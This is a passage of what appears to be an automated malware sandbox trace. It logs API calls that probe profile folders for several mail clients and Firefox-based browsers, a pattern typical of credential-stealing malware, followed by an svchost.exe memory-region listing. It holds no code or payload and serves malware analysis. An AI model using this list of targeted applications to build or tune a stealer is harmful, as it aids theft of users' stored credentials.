"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\k-meleon"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.570] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\", lpFilePart=0x0) returned 0x2e [0189.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\postbox"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.571] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\", lpFilePart=0x0) returned 0x32 [0189.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.571] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\", lpFilePart=0x0) returned 0x37 [0189.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Comodo\\IceDragon\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\comodo\\icedragon"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.571] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\", lpFilePart=0x0) returned 0x2f [0189.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Waterfox\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\waterfox"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.571] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\", lpFilePart=0x0) returned 0x45 [0189.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.572] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\", lpFilePart=0x0) returned 0x3c [0189.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.572] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pecxstudios\\Cyberfox\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pecxstudios\\cyberfox"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff4a8) returned 1 [0189.715] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk0izb3r.ggg", nBufferLength=0x105, lpBuffer=0x57fef68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk0izb3r.ggg", lpFilePart=0x0) returned 0x32 [0189.715] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\lk0izb3r.ggg\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\lk0izb3r.ggg\\*"), lpFindFileData=0x57ff1d0 | out: lpFindFileData=0x57ff1d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff46c) returned 1 [0189.898] CoUninitialize () Thread: id = 181 os_tid = 0x1264 [0209.092] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0209.093] CoGetContextToken (in: pToken=0x510f8c4 | out: pToken=0x510f8c4) returned 0x0 [0209.093] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x510f8e8 | out: ppvObject=0x510f8e8*=0x524154) returned 0x0 [0209.094] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x510f914 | out: pThreadType=0x510f914*=0) returned 0x0 [0209.094] IUnknown:Release (This=0x524154) returned 0x1 [0209.094] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0209.094] CoUninitialize () [0209.094] RoInitialize () returned 0x1 [0209.094] RoUninitialize () returned 0x0 [0209.095] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x510f5c8 | out: UnbiasedTime=0x510f5c8) returned 1 [0209.095] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x510f5b8 | out: UnbiasedTime=0x510f5b8) returned 1 [0209.098] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x510f4b4 | out: lpSystemTimeAsFileTime=0x510f4b4*(dwLowDateTime=0x7d3dd4b4, dwHighDateTime=0x1d8a8ba)) [0209.116] GetLastInputInfo (in: plii=0x226cc54 | out: plii=0x226cc54*(cbSize=0x8, dwTime=0x2277fa7)) returned 1 [0229.122] CoUninitialize () Thread: id = 182 os_tid = 0x125c Thread: id = 183 os_tid = 0x12b0 [0209.121] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0209.122] CoGetContextToken (in: pToken=0x5a5f844 | out: pToken=0x5a5f844) returned 0x0 [0209.122] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a5f868 | out: ppvObject=0x5a5f868*=0x524154) returned 0x0 [0209.123] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x5a5f894 | out: pThreadType=0x5a5f894*=0) returned 0x0 [0209.123] IUnknown:Release (This=0x524154) returned 0x1 [0209.123] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0209.123] CoUninitialize () [0209.123] RoInitialize () returned 0x1 [0209.123] RoUninitialize () returned 0x0 [0229.430] CoUninitialize () Thread: id = 184 os_tid = 0x11a0 [0239.131] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0239.133] CoGetContextToken (in: pToken=0x7ff7c4 | out: pToken=0x7ff7c4) returned 0x0 [0239.133] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7ff7e8 | out: ppvObject=0x7ff7e8*=0x524154) returned 0x0 [0239.133] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x7ff814 | out: pThreadType=0x7ff814*=0) returned 0x0 [0239.133] IUnknown:Release (This=0x524154) returned 0x1 [0239.133] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0239.133] CoUninitialize () [0239.133] RoInitialize () returned 0x1 [0239.133] RoUninitialize () returned 0x0 [0239.134] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x7ff4c8 | out: UnbiasedTime=0x7ff4c8) returned 1 [0239.134] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x7ff4b8 | out: UnbiasedTime=0x7ff4b8) returned 1 [0239.135] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7ff3b4 | out: lpSystemTimeAsFileTime=0x7ff3b4*(dwLowDateTime=0x8f2588e8, dwHighDateTime=0x1d8a8ba)) [0239.136] GetLastInputInfo (in: plii=0x226cc54 | out: plii=0x226cc54*(cbSize=0x8, dwTime=0x227f5d1)) returned 1 [0259.156] CoUninitialize () Thread: id = 185 os_tid = 0x1258 Thread: id = 186 os_tid = 0x137c [0239.158] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0239.158] CoGetContextToken (in: pToken=0x57bf744 | out: pToken=0x57bf744) returned 0x0 [0239.159] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x57bf768 | out: ppvObject=0x57bf768*=0x524154) returned 0x0 [0239.159] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x57bf794 | out: pThreadType=0x57bf794*=0) returned 0x0 [0239.159] IUnknown:Release (This=0x524154) returned 0x1 [0239.159] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0239.159] CoUninitialize () [0239.159] RoInitialize () returned 0x1 [0239.159] RoUninitialize () returned 0x0 [0259.162] CoUninitialize () Thread: id = 190 os_tid = 0xc30 [0269.165] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0269.167] CoGetContextToken (in: pToken=0x7ff6c4 | out: pToken=0x7ff6c4) returned 0x0 [0269.167] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7ff6e8 | out: ppvObject=0x7ff6e8*=0x524154) returned 0x0 [0269.168] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x7ff714 | out: pThreadType=0x7ff714*=0) returned 0x0 [0269.168] IUnknown:Release (This=0x524154) returned 0x1 [0269.168] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0269.168] CoUninitialize () [0269.168] RoInitialize () returned 0x1 [0269.168] RoUninitialize () returned 0x0 [0269.169] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x7ff3c8 | out: UnbiasedTime=0x7ff3c8) returned 1 [0269.169] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x7ff3b8 | out: UnbiasedTime=0x7ff3b8) returned 1 [0269.170] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7ff2b4 | out: lpSystemTimeAsFileTime=0x7ff2b4*(dwLowDateTime=0xa10e3ce5, dwHighDateTime=0x1d8a8ba)) [0269.171] GetLastInputInfo (in: plii=0x226cc54 | out: plii=0x226cc54*(cbSize=0x8, dwTime=0x228735e)) returned 1 [0289.436] CoUninitialize () Thread: id = 191 os_tid = 0x4ac Thread: id = 193 os_tid = 0x5b0 [0299.199] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0299.200] CoGetContextToken (in: pToken=0x50cf644 | out: pToken=0x50cf644) returned 0x0 [0299.200] IUnknown:QueryInterface (in: This=0x524148, riid=0x694738a4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x50cf668 | out: ppvObject=0x50cf668*=0x524154) returned 0x0 [0299.201] IComThreadingInfo:GetCurrentThreadType (in: This=0x524154, pThreadType=0x50cf694 | out: pThreadType=0x50cf694*=0) returned 0x0 [0299.201] IUnknown:Release (This=0x524154) returned 0x1 [0299.201] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0299.201] CoUninitialize () [0299.207] RoInitialize () returned 0x1 [0299.207] RoUninitialize () returned 0x0 [0299.208] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x50cf348 | out: UnbiasedTime=0x50cf348) returned 1 [0299.209] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x50cf338 | out: UnbiasedTime=0x50cf338) returned 1 [0299.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x50cf234 | out: lpSystemTimeAsFileTime=0x50cf234*(dwLowDateTime=0xb2f5dbe8, dwHighDateTime=0x1d8a8ba)) [0299.210] GetLastInputInfo (in: plii=0x226cc54 | out: plii=0x226cc54*(cbSize=0x8, dwTime=0x228eb0e)) returned 1 Thread: id = 194 os_tid = 0x3b0 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75956000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1512 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1513 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1514 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1515 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1516 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1517 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1518 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1519 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1520 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1521 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1522 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1523 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1524 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1525 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1526 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1527 start_va = 0x420000 end_va = 0x426fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1528 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1529 start_va = 0x460000 end_va = 0x466fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1530 start_va = 0x470000 end_va = 0x474fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1531 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1532 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1533 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1534 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1535 start_va = 0x5e0000 end_va = 0x5effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1536 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1537 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1538 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1539 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1540 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1541 start_va = 0x8b0000 end_va = 0x8bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1542 start_va = 0x8c0000 end_va = 0x8c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1543 start_va = 0x8d0000 end_va = 0x8d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1544 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1545 start_va = 0x8f0000 end_va = 0x8f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1546 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1547 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1548 start_va = 0xb90000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1549 start_va = 0xc90000 end_va = 0xc93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1550 start_va = 0xca0000 end_va = 0xcb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1551 start_va = 0xcc0000 end_va = 0xcc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1552 start_va = 0xcd0000 end_va = 0xd14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 1553 start_va = 0xd20000 end_va = 0xd2cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1554 start_va = 0xd30000 end_va = 0xd36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 1555 start_va = 0xdc0000 end_va = 0xdc8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1556 start_va = 0xdd0000 end_va = 0xdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1557 start_va = 0xde0000 end_va = 0xde1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1558 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1559 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1560 start_va = 0x1000000 end_va = 0x1336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1561 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1562 start_va = 